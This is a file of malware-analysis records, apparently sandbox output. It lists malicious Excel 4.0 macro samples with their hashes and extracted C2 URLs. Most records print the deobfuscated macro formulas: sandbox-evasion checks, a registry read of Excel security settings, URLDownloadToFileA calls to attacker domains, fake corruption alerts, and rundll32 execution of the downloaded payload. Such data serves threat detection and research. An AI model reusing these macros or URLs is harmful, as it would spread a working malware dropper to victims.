{"version":"0.2","sample":{"sample":"","kind":"file","target":"6c823de62a4441003b1898af8be3f1deca32b92e05223e5f01017554dff6a749"},"analysis":{"reported":"2020-04-09T16:16:54Z","score":10},"files":[{"filename":"6c823de62a4441003b1898af8be3f1deca32b92e05223e5f01017554dff6a749","filesize":147968,"md5":"c6812c93d6978d694360b17325dccbee","sha1":"9521972f923525826a30801ae7f314a843d19dc0","sha256":"6c823de62a4441003b1898af8be3f1deca32b92e05223e5f01017554dff6a749","sha512":"3cdb32451b0a9c5f7f8e701179b0ca780544f667f550475c3fb3df9fa473ae391cf8335d5d9b371572dfed44cdc2cfb11835ffcd95d91fc98a54984a64fcf9c3","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"6c823de62a4441003b1898af8be3f1deca32b92e05223e5f01017554dff6a749.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://hxzfvomd.buzz/asf2f1ff"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$1C$0\u003c770,CLOSE(FALSE),)\nIF(R$2C$0\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nGET.WORKSPACE(26)\nRETURN()\nRETURN()\nRETURN()\nGOTO(R$0C$2)\nRETURN()\nWORKBOOK.HIDE(\"sz0PcYJAdY\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"6c85ad11e664864306b8caecd34c13225a6cb3a615b4a665c99d0b09fd2d4fe0"},"analysis":{"reported":"2020-04-09T16:16:54Z","score":10},"files":[{"filename":"6c85ad11e664864306b8caecd34c13225a6cb3a615b4a665c99d0b09fd2d4fe0","filesize":206336,"md5":"a91f189e8e753078f340018ce226fdc8","sha1":"06474a593f5c986da80a6d7a7df7214515d54ff4","sha256":"6c85ad11e664864306b8caecd34c13225a6cb3a615b4a665c99d0b09fd2d4fe0","sha512":"430152e6e9950e5f5fd38a849eff1f8d98c11a84d26fcf6332ba6a564328ac44a52ab7c39961bdaddace1f37df63239941bb1af20ef7b8b9bd5fe9b1c92de789","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"6c85ad11e664864306b8caecd34c13225a6cb3a615b4a665c99d0b09fd2d4fe0.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"625Lq2CeuW\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"6c9dd449dde683aa58926c64f99f2ec1e057901315d42724bbcd9cdfff162b58"},"analysis":{"reported":"2020-04-09T16:16:54Z","score":10},"files":[{"filename":"6c9dd449dde683aa58926c64f99f2ec1e057901315d42724bbcd9cdfff162b58","filesize":206336,"md5":"77fbb2db8499544c039021f96e08c850","sha1":"9be41e1e7700b5e4ead495a91c49b9f9df2a947c","sha256":"6c9dd449dde683aa58926c64f99f2ec1e057901315d42724bbcd9cdfff162b58","sha512":"e390d6f84584d5dca2dca22fe11a0ea6dea28da73d324af3f8dd31d64f8bb93d98ca1987561b9f3b1f7af9f4b7c3f6904cc7d59ede2dad7b5a22361a939237ba","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"6c9dd449dde683aa58926c64f99f2ec1e057901315d42724bbcd9cdfff162b58.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"77UoP7I2hF\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"6cb4d866f3518322f11b50352bd36398af12b25461040f40ccdb302558c38954"},"analysis":{"reported":"2020-04-09T16:16:54Z","score":10},"files":[{"filename":"6cb4d866f3518322f11b50352bd36398af12b25461040f40ccdb302558c38954","filesize":167936,"md5":"989891f923a0aa1621e45b14c1dcd1f2","sha1":"64972f8498e0e8fcc4a44bb06a103091760c044f","sha256":"6cb4d866f3518322f11b50352bd36398af12b25461040f40ccdb302558c38954","sha512":"7d673e53de4600821853992212867cb0b0cd347667ed57980c4feb3919e3fe09ad72d0b7395879814f06772406fb5b487124d51c9872aafb1efc9a399e82308b","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"6cb4d866f3518322f11b50352bd36398af12b25461040f40ccdb302558c38954.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"2rfqyarsxu\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"6cd45e3868fae5f1b058a5e3c0a4a86b059fa7543fcf9b5eac0e10a5eece0df2"},"analysis":{"reported":"2020-04-09T16:16:55Z","score":10},"files":[{"filename":"6cd45e3868fae5f1b058a5e3c0a4a86b059fa7543fcf9b5eac0e10a5eece0df2","filesize":112128,"md5":"922edf44ddca9e7adf856d11bdc2fc7e","sha1":"03a4d4308e6311961f2d10ede4a4dae0af72c747","sha256":"6cd45e3868fae5f1b058a5e3c0a4a86b059fa7543fcf9b5eac0e10a5eece0df2","sha512":"6ad7d176619860087c0004a4ab0681e70b7395492ff196f701ba729dc0bd29ca70cec9dc61bbc0052eaccd2750026efa0d47738df6c6d245740129e5a124ad7c","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"6cd45e3868fae5f1b058a5e3c0a4a86b059fa7543fcf9b5eac0e10a5eece0df2.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pnxkntdl.xyz/KJSDBViad7"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"6ce6feed2a262404dcc1ada34e2f4b04114eea08b2aa925324311944d749051c"},"analysis":{"reported":"2020-04-09T16:16:55Z","score":10},"files":[{"filename":"6ce6feed2a262404dcc1ada34e2f4b04114eea08b2aa925324311944d749051c","filesize":141312,"md5":"8aa37915658b0dc863e1855ef3db369e","sha1":"b8369f8c5c950e36c3f60245c8825935e5df4bf7","sha256":"6ce6feed2a262404dcc1ada34e2f4b04114eea08b2aa925324311944d749051c","sha512":"614e73d5d4ce07146abc43a0cf1553cfebf3c7bda98b11f5637f69d0f4dca06fd9fb8d4c3dfba4b9bb14e42d36855c3d3df29d71a58475ed08dcff50605db121","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"6ce6feed2a262404dcc1ada34e2f4b04114eea08b2aa925324311944d749051c.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pjtcdnrd.pw/ckjbvkf732"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$1C$0\u003c770,CLOSE(FALSE),)\nIF(R$2C$0\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nGET.WORKSPACE(26)\nRETURN()\nGOTO(R$0C$2)\nRETURN()\nRETURN()\nRETURN()\nWORKBOOK.HIDE(\"xdQ4LZhCb6\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"6ce986b1e961e06ac8ccb00ef7b38c71746fa273e22b0ef91610b33aed5ea99c"},"analysis":{"reported":"2020-04-09T16:16:55Z","score":10},"files":[{"filename":"6ce986b1e961e06ac8ccb00ef7b38c71746fa273e22b0ef91610b33aed5ea99c","filesize":167936,"md5":"48fc7d963a99a9160cc50c5abaa1b022","sha1":"8c34cb2c2fb94a01fd720656bb202fdf4acd1418","sha256":"6ce986b1e961e06ac8ccb00ef7b38c71746fa273e22b0ef91610b33aed5ea99c","sha512":"062e0e48779cd716b09f3319ba2ba6e1e97747bacc4c751fc5e13e9a2c3c459e8168ad6b99eab6d84af365b956aee8dce0eb892041c2fde0c58f505d792e4d54","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"6ce986b1e961e06ac8ccb00ef7b38c71746fa273e22b0ef91610b33aed5ea99c.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"3gOXWtF0ji\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"6ceceb9595effc8eb35e3339e55d80eee46e0d3e28a46c25daf468c684711e3e"},"analysis":{"reported":"2020-04-09T16:16:55Z","score":10},"files":[{"filename":"6ceceb9595effc8eb35e3339e55d80eee46e0d3e28a46c25daf468c684711e3e","filesize":209920,"md5":"8b8a991a49cf8bbee368b84eac9926f0","sha1":"100cdfc17dbaf0b6d39bcc914283c05519212a7d","sha256":"6ceceb9595effc8eb35e3339e55d80eee46e0d3e28a46c25daf468c684711e3e","sha512":"9a6e4fd402f9032cb46e70cc9b514afb386ce153f5595490b0a15fe8abd42b275c5fe18b19909a309a124d7dae2562175ba23082b2ae42f3548106d0c88079cf","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"6ceceb9595effc8eb35e3339e55d80eee46e0d3e28a46c25daf468c684711e3e.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"GxLhVxiFmo\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"6cf8358f0e5ae80798a6822489c96e2c5cbc4f2bed7213834c04b21395bb9d4e"},"analysis":{"reported":"2020-04-09T16:16:55Z","score":10},"files":[{"filename":"6cf8358f0e5ae80798a6822489c96e2c5cbc4f2bed7213834c04b21395bb9d4e","filesize":185344,"md5":"159f54e78f6f7f99013d657b7b5558c1","sha1":"967d45ab45328669357b516928956578aaf69a91","sha256":"6cf8358f0e5ae80798a6822489c96e2c5cbc4f2bed7213834c04b21395bb9d4e","sha512":"805a06db6ecb7efcecdad4f5ac2dd9354fc36eb3a7cf51f7c37c284ff497ddf7d75e5c8a2354afa81c13a730dafb3882585c72156fc6d163d956488004d08bcd","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"6cf8358f0e5ae80798a6822489c96e2c5cbc4f2bed7213834c04b21395bb9d4e.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://veqejzkb.xyz/SDVe2f2fds"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"6d06dc57a74bc6ca7273d6eba461e2206df811a02ffae18f1a1088bcda870d9c"},"analysis":{"reported":"2020-04-09T16:16:55Z","score":10},"files":[{"filename":"6d06dc57a74bc6ca7273d6eba461e2206df811a02ffae18f1a1088bcda870d9c","filesize":160768,"md5":"7c4777e2a469b31cd18905c7b02deaa9","sha1":"dc7bdaef1b1dcf85400d14890ab92cc34ab0e39b","sha256":"6d06dc57a74bc6ca7273d6eba461e2206df811a02ffae18f1a1088bcda870d9c","sha512":"01ea11e9f91c3f08b3ce738fb4f70412655ac7f0fa4845602746baeef091422efc6b2902193d8309a1c780c5c3e8b89cb74384850db544d7718083282da16212","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"6d06dc57a74bc6ca7273d6eba461e2206df811a02ffae18f1a1088bcda870d9c.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/deg34g","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cmgp5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"Ypuhsv4sQg\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"6d1850d7fdfa2ce3d4d85d6cd6d800202f27548116de55bae57a0571f724dff2"},"analysis":{"reported":"2020-04-09T16:16:55Z","score":10},"files":[{"filename":"6d1850d7fdfa2ce3d4d85d6cd6d800202f27548116de55bae57a0571f724dff2","filesize":214016,"md5":"de15a8a01f68a38119b20b3228748048","sha1":"e8dfa662879449b44d7652a754d7932f5197f0cb","sha256":"6d1850d7fdfa2ce3d4d85d6cd6d800202f27548116de55bae57a0571f724dff2","sha512":"0eb256122ae283e3dbc9ec51aa55099d4f26a61532827c5a86c839a69e38173159bc662bdcaeedc747f030274c78068e2789ee2d5ca1f0b3ca3254944f8d8073","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"6d1850d7fdfa2ce3d4d85d6cd6d800202f27548116de55bae57a0571f724dff2.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://amgdorie.online/avdv42g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://amgdorie.online/avdv42g\",\"c:\\Users\\Public\\bug65ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"QRnb7lzL9n\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"6d1e052552f8798312cbe4ab48f9775b1b158562ce7f1bcd396cae21c3dde07e"},"analysis":{"reported":"2020-04-09T16:16:55Z","score":10},"files":[{"filename":"6d1e052552f8798312cbe4ab48f9775b1b158562ce7f1bcd396cae21c3dde07e","filesize":185344,"md5":"ffd472a08242401ec14b26bc62d96775","sha1":"a3d5e7bfdf75e35fcae32c93e5548092a6d4f786","sha256":"6d1e052552f8798312cbe4ab48f9775b1b158562ce7f1bcd396cae21c3dde07e","sha512":"a32ad8b8141a173b8f211d6577301ec02e83069897b9c256e3f40ceb79bf74af942f8620f45117cdc99683b2623bebfbf1bd49942a64819b5ea19091bf568db2","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"6d1e052552f8798312cbe4ab48f9775b1b158562ce7f1bcd396cae21c3dde07e.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/6ng688x8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"6d1f643fd3e3973ab73cbb6f330015797279a10fe0921e3ad73243efd42116d4"},"analysis":{"reported":"2020-04-09T16:16:55Z","score":10},"files":[{"filename":"6d1f643fd3e3973ab73cbb6f330015797279a10fe0921e3ad73243efd42116d4","filesize":167936,"md5":"9789f8486ad696990d892b5cda01c0f7","sha1":"e4883e3bb54bb8ff46fbc519fb2dc5c2de1c6d29","sha256":"6d1f643fd3e3973ab73cbb6f330015797279a10fe0921e3ad73243efd42116d4","sha512":"152d357dcbb77dd062dc489c07e8ff524adfbfd2104b2062eda746a24a0efdf9c30767c94390066595bb9da8b3693b80968f822573fd77d1f3beed2c03813434","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"6d1f643fd3e3973ab73cbb6f330015797279a10fe0921e3ad73243efd42116d4.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"s3Qew2FNE2\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"6d396a266b854a52f94c8d0262b193f935238786dd192198b1c9cc3d214599d9"},"analysis":{"reported":"2020-04-09T16:16:55Z","score":10},"files":[{"filename":"6d396a266b854a52f94c8d0262b193f935238786dd192198b1c9cc3d214599d9","filesize":168448,"md5":"15790e3b8a206f6fa4835a671b8e12cf","sha1":"ff828442dcffd080d52170e9af1b30bf73f2f134","sha256":"6d396a266b854a52f94c8d0262b193f935238786dd192198b1c9cc3d214599d9","sha512":"421bf8df48ccce6e7982fd5c424c657182942dcdd42c064abf6177fba1fdb2c31e2ba939c54f34eb7099ced1d5ca0fb191be86edc9b3112cca98bc46190d85c7","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"6d396a266b854a52f94c8d0262b193f935238786dd192198b1c9cc3d214599d9.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/bag4hy","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/bag4hy\",\"c:\\Users\\Public\\cogp5yf.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cogp5yf.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cogp5yf.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"CiI6Mc6jed\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"6d78c868789997c48352d2637a778000ec7d717d84c4ee898b2c992904559154"},"analysis":{"reported":"2020-04-09T16:16:55Z","score":10},"files":[{"filename":"6d78c868789997c48352d2637a778000ec7d717d84c4ee898b2c992904559154","filesize":167936,"md5":"3fa0ba0669c2e56f21f3bf4ed15cf95d","sha1":"ef288105289d8b91a638e37dcc7d1fc2e5268617","sha256":"6d78c868789997c48352d2637a778000ec7d717d84c4ee898b2c992904559154","sha512":"e1c9d23931c368ed4dd53b27ddce0e980b8da21b80297a2ad5f7f8b92fa331abd0df79877dfa0c7564a848fad82e3139e93a6a7b486ff4edcf72b543534aff0b","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"6d78c868789997c48352d2637a778000ec7d717d84c4ee898b2c992904559154.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"1SKSYMzF4O\",TRUE)\nGOTO(R$0C$19)"}}}]}
